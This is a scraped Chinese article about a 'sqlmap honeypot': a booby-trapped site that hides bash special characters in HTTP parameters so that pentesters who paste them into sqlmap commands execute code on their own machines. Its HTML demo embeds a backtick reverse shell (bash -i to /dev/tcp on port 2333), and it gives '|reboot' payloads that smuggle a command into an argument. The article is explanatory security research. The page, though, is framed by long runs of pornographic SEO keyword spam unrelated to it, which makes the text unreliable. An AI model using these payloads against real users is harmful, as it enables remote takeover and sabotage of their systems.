精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

注意了,使用Sqlmap的你可能踩中了“蜜罐”

安全 數(shù)據(jù)安全
你站在橋上看風(fēng)景,看風(fēng)景的人在樓上看你,明月裝飾了你的窗子,你裝飾了別人的夢。

Par0:楔子

你站在橋上看風(fēng)景,看風(fēng)景的人在樓上看你,

明月裝飾了你的窗子,你裝飾了別人的夢。

Par1:你要了解的事

滲透測試的同學(xué)應(yīng)該都知道,在Linux下,sqlmap執(zhí)行的語句大多是:

  1. Bash#sqlmap –u "http://sample.com/a=xxx&b=xxx" –data "postdata
  2. or 
  3. Bash#python sqlmap.py –u "http://sample.com/a=xxx&b=xxx" –cookie "cookedata

如此形式的語句執(zhí)行,實際上都是在shell中,執(zhí)行bash命令。

但是,bash命令中,一些使用幾率較小的特性,很多安全測試人員可能都不求甚解。

通過閱讀Bash參考手冊,可以了解到,在bash命令中,一些字符在封閉的雙引號中,有特殊的含義,并非所見即所得。

Enclosing characters in double quotes (‘"’)preserves the literal value of all characters within the quotes, with theexception of ‘$’, ‘`’, ‘\’, and, whenhistory expansion is enabled, ‘!’. When the shell is in POSIX mode (seeBash POSIX Mode),the ‘!’ hasno special meaning within double quotes, even when history expansion isenabled. The characters ‘$’ and ‘`’ retain theirspecial meaning within double quotes (see Shell Expansions).The backslash retains its special meaning only when followed by one of the followingcharacters: ‘$’, ‘`’, ‘"’, ‘\’, or newline. Within doublequotes, backslashes that are followed by one of these characters are removed.Backslashes preceding characters without a special meaning are left unmodified.A double quote may be quoted within double quotes by preceding it with abackslash. If enabled, history expansion will be performed unless an ‘!’ appearing indouble quotes is escaped using a backslash. The backslash preceding the ‘!’ is notremoved.

The special parameters ‘*’ and ‘@’ have specialmeaning when in double quotes (see Shell Parameter Expansion).

如果,懶著弄明白上面的意思,最好的辦法就是在自己的Linux中執(zhí)行相關(guān)的命令:

如ping “!!”,ping “`reboot`”,看看會產(chǎn)生怎樣神奇的效果

說的明白點,雙引號中的”!!”或者”!+數(shù)字”,會替換成歷史命令,執(zhí)行”history”命令,就可以知道哪些數(shù)字對應(yīng)哪些命令了。如果我將”!”放入到http請求中,而滲透測試人員執(zhí)行例如

  1. bash# sqlmap -u "www.asnine.com/test" --data"post!!request=hacked

首先雙引號中的!!會被替換成你最近執(zhí)行的一條歷史命令,然后在發(fā)送到webserver,如果webserver是惡意的,那么他就可以輕松的收集到你的bash中的歷史輸入了,也算是一種信息泄露吧。

如果僅僅是信息收集,危害還小一些,如果用”`”(數(shù)字1前面那個反單引號字符),可就厲害了。任何”`”之間的命令,都會被執(zhí)行,如果僅僅是為了好玩,一個reboot,就夠你受了,但是如果還有其他的想法,你的系統(tǒng)可就危在旦夕了

如果我將這些特殊的字符(“!” , “`”…)放到get/post/cookie等http請求參數(shù)中,萬一有人用sqlmap去對該網(wǎng)站進行安全測試,而注入?yún)?shù)正好包含了這些特殊字符,那么有意思的事情就產(chǎn)生了

此時,你通過攔截瀏覽器獲取的http post如果是惡意代碼

執(zhí)行:

  1. sqlmap –u "http://sample.com/a=xxx&b=xxx" –data "evilcode

結(jié)果就是,裝逼不成反被BI~

Par2:姑且稱之為sqlmap honeypot吧

現(xiàn)在,我的目的很單純,就是將特殊字符嵌入到http的請求數(shù)據(jù)中,以達(dá)到對滲透人員的反戈一擊。

要做到一個強力的反擊,首先需要將諸如”!”, “`”等字符串,放入http請求中。

而http請求,主要包括get request,cookie,post request三種。

大多時候,滲透人員通過獲取post數(shù)據(jù)作為sql的注入點,所以,要找到一種在post情況下的危險參數(shù)注入。

由于post數(shù)據(jù),可以構(gòu)造的相對比較復(fù)雜,很多時候,滲透人員只是將所有參數(shù)一股腦的作為sqlmap的data參數(shù)進行測試,所以可以很好的做到將危險參數(shù)嵌入到post data數(shù)據(jù)中,以達(dá)到隱藏自身的目的。

接下來,要做的就是如果滲透人員在通過利用例如Burp Suite等工具獲取sqlmap注入使用的參數(shù)時,獲取到的字符為未編碼的可見字符。

在用form進行提交數(shù)據(jù)時,如果添加enctype=”text/plain”屬性,那么,就可以做到可見即可得。

測試demo:

  1. html> 
  2. head> 
  3. title> A sqlmap honeypot demotitle> 
  4. head> 
  5. body> 
  6. input>search the userinput> 
  7. form id="myForm" action="username.html" method="post" enctype="text/plain"> 
  8. input type='hidden' name='name'value='Robin&id=4567&command=shell`bash -i >&/dev/tcp/192.168.xxx.xxx/2333 0>&1`&port=1234'/> 
  9. input type="button" value="Submit"> 
  10. form> 
  11. body> 
  12. html> 

訪問該頁面,進行查詢時,發(fā)送到請求為:

這時,很多沒有經(jīng)驗的安全滲透人員就可能將postdata,復(fù)制,粘貼,sqlmap執(zhí)行之:

Boom!

Par3:換個姿勢,再來一遍

前兩拍,為了所謂的神秘感,利用人們不常用的bash特性,強行裝了一波。

但是,既然利用場景是:

bash# exec "evil code"

那么事情可能會變得更加簡單。

使用過Linux的,大多數(shù)都用到過管道(|),而這個功能,能更好好的完成任務(wù)。

如果注入?yún)?shù)是:

"|reboot" (參數(shù)中包含雙引號)

那么執(zhí)行的命令則為:

bash# exec ""|reboot""

以上,我都假設(shè)的是,滲透人員將參數(shù)放入到雙引號(“)中。但使用管道,單引號的問題也迎刃而解

針對單引號,可以將注入?yún)?shù)設(shè)置為:

'|reboot'

Double Kill!

Par4:尾聲

以上都是我在測試一個網(wǎng)站時,其cookie中包含了

"!+number"

導(dǎo)致了sqlmap語句的執(zhí)行錯誤引起的。于是乎,深入追蹤了下,發(fā)現(xiàn)其實主要原因?qū)儆赽ash的特性。如果利用這個特性做惡,的確存在一定的安全風(fēng)險。

很多時候,我們并不能確保輸入數(shù)據(jù)安全性,尤其在使用sqlmap這種輸入?yún)?shù)來源于攻擊目標(biāo)的情況下。如果有人在獲取的參數(shù)(get/post/cookie)上動了手腳,滲透人員很可能偷雞不成拾把屎。

相信,只要理解了攻擊手段,很多人會構(gòu)造出更完美的攻擊數(shù)據(jù),這里就不獻丑了。

而且,偽裝到位的話,服務(wù)器甚至可以返回一些注入成功的信息

這個時候,sqlmap使用者,就有些悲劇了,他們沉浸在在成功的喜悅中,卻未料到背后隱藏的殺機

 

當(dāng)然,這種利用bash特性的攻擊方式,并不僅僅作用于sqlmap,也可能用于其它依賴于Linux命令行執(zhí)行的程序。Sqlmap只不過是這種特性的一個很好的利用場景。

責(zé)任編輯:趙寧寧 來源: 黑吧安全網(wǎng)
相關(guān)推薦

2017-02-07 10:40:36

2021-09-29 10:37:22

安全隱患蘋果系統(tǒng)漏洞

2018-06-01 09:11:23

2020-07-29 19:40:36

Vue 3.0Vue前端

2025-07-08 09:09:32

MySQL類型

2025-04-16 04:00:00

2021-10-25 22:48:53

手機電池中毒

2020-06-23 10:28:30

軟件研發(fā)交付

2020-11-20 07:54:22

Java 特性語句

2024-09-30 09:28:34

軟件研發(fā)交付

2024-04-10 08:39:56

BigDecimal浮點數(shù)二進制

2017-11-17 09:35:00

筆記本CPU中央處理器

2021-12-06 10:20:19

微信社交功能

2009-04-17 15:19:25

職場過時晚年

2013-09-17 13:52:00

工程師產(chǎn)品產(chǎn)品文案

2021-04-14 17:34:18

線程安全

2018-03-15 15:09:29

iOS圖片標(biāo)記蘋果

2024-01-09 08:08:32

元數(shù)據(jù)topicPulsar

2018-10-12 14:21:26

流量套餐運營商

2024-04-01 08:05:27

Go開發(fā)Java
點贊
收藏

51CTO技術(shù)棧公眾號

精品卡一卡二卡三卡四在线| 久久美女艺术照精彩视频福利播放 | 久久99久久99精品中文字幕| 中国黄色片视频| 国产在线拍揄自揄拍视频| 成人av免费在线| 国产精品一区二区三区久久久| 蜜桃视频最新网址| wwww亚洲| 污污的视频网站在线观看| 91超碰国产在线| 91久色porny| 96sao精品视频在线观看| 久久精品国产亚洲av高清色欲| 国内精品久久久久久久久电影网| 欧美一级高清片| 亚洲成人第一| 亚洲精品久久久狠狠狠爱| 亚洲一区二区| 亚洲男人天堂2023| 中文字幕无码精品亚洲35| 91社区在线观看播放| 性一交一乱一区二区洋洋av| 精品国产一区二区三区久久久狼| 苍井空张开腿实干12次| 欧美大片1688网站| 国产视频一区二区在线| 国产成人精品免费视频大全最热| 亚洲视频中文字幕在线观看| 国产一级久久| 久久久久久久电影一区| 中文字幕电影av| 精品理论电影在线| 精品亚洲永久免费精品| 黄色片视频在线播放| 美女精品导航| 亚洲免费高清视频在线| 一区精品在线| 国产口爆吞精一区二区| 热久久久久久久| 欧美亚洲国产另类| 日本午夜小视频| 欧美性色综合| 欧美激情精品久久久久久蜜臀 | 粉嫩嫩av羞羞动漫久久久| 国产精品69av| 丁香社区五月天| 久久先锋资源| 青青精品视频播放| 无码人妻黑人中文字幕| 六月天综合网| 欧美一级电影免费在线观看| 草久久免费视频| 国产美女诱惑一区二区| 97在线看福利| 男人午夜免费视频| 国产91精品对白在线播放| 亚洲а∨天堂久久精品喷水| 久久久久亚洲AV成人网人人小说| 欧州一区二区三区| 日韩欧美激情四射| 国产精品日日摸夜夜爽| 国产精品网在线观看| 亚洲国产欧美自拍| 国产精品探花一区二区在线观看| 欧美日韩看看2015永久免费| 亚洲精品久久久久中文字幕二区| 成人免费无码大片a毛片| 亚洲三级性片| 中文字幕亚洲欧美在线| 精人妻一区二区三区| 伊色综合久久之综合久久| 成人中文字幕视频| 亚洲欧洲日产国码二区| 在线观看欧美激情| 国产在线激情| 亚洲伊人伊色伊影伊综合网| 免费国产黄色网址| 国产成人精品亚洲日本在线观看| 欧美日韩在线精品一区二区三区激情| 久久久精品高清| 一区二区三区国产好| 日韩电视剧在线观看免费网站| www在线观看免费视频| 久久亚洲成人| 国模极品一区二区三区| 蜜臀精品一区二区三区| 久久91精品国产91久久小草| 国产99视频精品免费视频36| 国内爆初菊对白视频| 久久精品一区二区三区四区| av电影一区二区三区| heyzo高清中文字幕在线| 91传媒视频在线播放| 免费人成视频在线播放| 亚洲男人都懂第一日本| 久久精品成人欧美大片| 欧美不卡视频在线观看| 蜜桃久久久久久| 国产精品青青草| 香蕉视频免费在线播放| 亚洲二区在线视频| 天堂中文视频在线| 澳门成人av| 精品国产一区二区三区久久久狼 | 国产精品偷拍| 亚洲v日本v欧美v久久精品| 中文字幕在线观看第三页| 91大神精品| 色偷偷888欧美精品久久久| 国产精品免费av一区二区| 久久99精品久久久久| 国产一区二区三区高清视频| 美女av在线播放| 久久久高清一区二区三区| 成人高清dvd| 2019年精品视频自拍| 亚洲精品电影久久久| 五月天婷婷色综合| 免费在线看成人av| 久久国产精品久久| 羞羞网站在线看| 欧美日本免费一区二区三区| 伊人网在线视频观看| 亚洲国产第一| 亚洲最大福利视频网| 婷婷五月在线视频| 91久久一区二区| 亚洲蜜桃精久久久久久久久久久久| 欧美99久久| 国产综合香蕉五月婷在线| 国产三级在线看| 日韩欧美在线网址| 内射中出日韩无国产剧情| 国产真实久久| 91亚色免费| a级影片在线| 欧美日韩成人综合| 阿v天堂2014| 亚洲国产精品无码久久久| 欧美涩涩视频| 99在线看视频| a视频在线观看免费| 在线播放视频一区| 久久人妻无码aⅴ毛片a片app| 欧美a级一区二区| 神马影院一区二区三区| 亚洲成人一区在线观看| 亚洲天堂av在线播放| 亚洲精品午夜视频| 日韩视频中文| 精品久久蜜桃| 自拍偷拍亚洲视频| 亚洲精品天天看| 九九热在线免费观看| 91麻豆精品在线观看| 男女高潮又爽又黄又无遮挡| 欧美爱爱网站| 热re91久久精品国99热蜜臀| 欧美91精品久久久久国产性生爱| 欧美日韩午夜视频在线观看| 最新中文字幕视频| 日日骚欧美日韩| 一区二区三区在线视频看| 日韩精品第二页| 久操成人在线视频| 丰满人妻一区二区三区免费| 香蕉乱码成人久久天堂爱免费| 美女黄色一级视频| 99精品视频免费| 日韩欧美亚洲v片| 欧美成人家庭影院| 久色乳综合思思在线视频| 国产精彩视频在线观看| 成人av网址在线| 亚洲欧美一区二区三区久久| 男人亚洲天堂网| 国产中文字幕一区二区三区| 国产精品久久久久999| 韩国中文字幕在线| 亚洲第一页自拍| 国产女主播喷水视频在线观看| 国产精品丝袜久久久久久app| 性生活在线视频| 免费日韩av片| 女女同性女同一区二区三区按摩| 成人盗摄视频| 国产精品久久久久久久7电影| 免费av在线播放| 亚洲福利精品在线| 中文字幕 视频一区| 亚洲最大色网站| 亚洲精品自拍网| 国产精品啊v在线| 日韩欧美电影一区二区| 日韩在线成人| 国产精品夫妻激情| 97在线视频免费观看完整版| 中文字幕日韩av电影| 深爱激情五月婷婷| 7777精品伊人久久久大香线蕉| 国偷自拍第113页| 亚洲色欲色欲www在线观看| 香港三级日本三级| 国产在线精品一区二区三区不卡 | 免费一区视频| 公共露出暴露狂另类av| 竹菊久久久久久久| 国产精品xxxx| 99久久999| 国产精品高潮呻吟久久av黑人| 波多野结衣中文在线| 日韩视频精品在线| 欧美少妇另类| 亚洲第一偷拍网| 精品久久久久久亚洲综合网站| 在线观看不卡一区| 国产成人在线免费观看视频| 亚洲狼人国产精品| 亚洲自拍偷拍一区| 中文字幕av影院| 亚洲成人av在线电影| 麻豆明星ai换脸视频| 欧美激情一区在线| a级大片在线观看| 不卡av免费在线观看| 爱情岛论坛亚洲自拍| 久久国产三级精品| 9l视频白拍9色9l视频| 老司机午夜精品视频| 1024av视频| 99热精品在线| 久久久久久免费看| 一呦二呦三呦精品国产| 久久久天堂国产精品女人| а√天堂官网中文在线| 自拍偷拍亚洲一区| av在线中文| 中文字幕日韩在线观看| 国产一级片在线| 国产一区二区三区丝袜| 美国一级片在线免费观看视频| 日韩成人在线电影网| 日本美女一级片| 亚洲国产欧美自拍| 深夜福利视频在线观看| 色狠狠一区二区三区香蕉| 日韩精品一卡二卡| 婷婷中文字幕综合| 日韩成人在线免费视频| 午夜精品视频一区| 日韩精品乱码久久久久久| 精品久久久久久久久中文字幕| 日韩成年人视频| 欧美日韩中文字幕综合视频| 黄色激情在线视频| av在线播放网站| 亚洲人成电影在线| 极品美乳网红视频免费在线观看| 亚洲深夜福利网站| 在线免费av网站| 久久亚洲精品视频| 激情av在线| 91极品女神在线| 台湾佬成人网| 国产免费成人av| 亚洲成人五区| 久久精品一二三区| 欧美精品羞羞答答| 麻豆中文字幕在线观看| 韩日精品视频| 国产成人精品视频免费看| 久久久久.com| 午夜一级免费视频| av成人动漫在线观看| 少妇精品无码一区二区免费视频| 成人免费在线观看入口| 精品一级少妇久久久久久久| 国产视频一区不卡| 香蕉久久久久久久| 一区二区三区欧美视频| 成人精品免费在线观看| 欧美在线小视频| www.五月激情| 亚洲精品一区二区久| 麻豆网站在线观看| 午夜剧场成人观在线视频免费观看| 中文字幕在线看片| 96pao国产成视频永久免费| 日本成人7777| 国产免费一区二区三区四在线播放| 合欧美一区二区三区| 日本成人黄色网| 粉嫩欧美一区二区三区高清影视| 波多野结衣av在线观看| 一区二区三区高清| 亚洲 国产 日韩 欧美| 亚洲二区在线观看| 无码日韩精品一区二区| 欧美一激情一区二区三区| 国产999视频| 韩国女主播一区二区| 高清不卡日本v二区在线| 国产伦一区二区三区| 日韩欧美视频免费在线观看| 久久香蕉精品| 最新版天堂资源在线| 国产精品美日韩| 欧美bbbbbbbbbbbb精品| 91精品国产高清一区二区三区| 青青久在线视频| 欧美福利在线观看| 免费日韩成人| 欧美大香线蕉线伊人久久| 91精品国产自产在线观看永久∴ | 国产精品一区hongkong| 国产日韩欧美在线| 亚州综合一区| www.av91| 国产精品99久久久久久久女警| 一级肉体全黄裸片| 午夜精品久久久久久久99水蜜桃 | 日韩精品一区二区三区中文在线| 精品免费国产| 欧美日韩国产探花| 国产福利精品一区二区三区| 中文字幕精品在线不卡| 综合网在线观看| 亚洲成人免费在线视频| 三级资源在线| 久久国产视频播放| 激情网站在线| 日韩亚洲精品视频| 一本大道色婷婷在线| 91九色对白| 偷拍欧美精品| 亚洲精品久久久中文字幕| 久久精品亚洲国产奇米99| 日韩和一区二区| 精品成a人在线观看| 羞羞的视频在线观看| 91在线免费观看网站| 国产精品久久久久久久| 欧美美女一级片| 国产精品对白交换视频| 中文字幕码精品视频网站| 在线电影av不卡网址| jizz久久久久久| 亚洲女人毛片| 久久99国内精品| 日韩三级在线观看视频| 欧美一区二区视频在线观看2020| 嫩草在线视频| 91在线观看免费网站| 国产精品xvideos88| 亚洲精品激情视频| 黄色一区二区在线| 欧美男男同志| 国产精品色视频| 91成人精品| 国产sm在线观看| 亚洲va天堂va国产va久| 亚洲欧洲综合在线| 国产成人精品a视频一区www| 日韩成人影院| 丰满少妇中文字幕| 亚洲国产精品久久不卡毛片| 人妻一区二区三区四区| 日本高清不卡的在线| 成人久久久久| 日本黄色一级网站| 精品毛片三在线观看| 国产在线一二三区| 成人精品一区二区三区电影黑人| 欧美 日韩 国产一区二区在线视频| 国产伦理在线观看| 欧美日韩在线视频一区二区| 中文字幕在线观看日本| 亚洲自拍偷拍在线| 99热这里只有成人精品国产| 怡红院一区二区三区| 在线成人免费观看| 一级黄色a视频| 精品国产视频在线| 欧美美女黄色| 五月天婷婷影视| 欧美日韩国产一区中文午夜| 色哟哟免费在线观看| 国产色综合一区二区三区| 日韩电影在线看| 国产亚洲欧美精品久久久www | 欧美在线观看在线观看| 国产欧美精品va在线观看| 国内揄拍国内精品久久| caopeng视频| 欧美成人女星排名| 日本一道高清亚洲日美韩| 国产一区二区三区乱码| 国产欧美一区二区精品久导航| 国产黄色一区二区|